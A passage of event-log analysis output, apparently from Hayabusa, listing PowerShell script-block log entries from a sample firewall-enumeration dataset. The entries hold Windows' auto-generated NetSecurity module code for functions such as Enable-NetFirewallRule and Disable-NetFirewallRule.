'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, 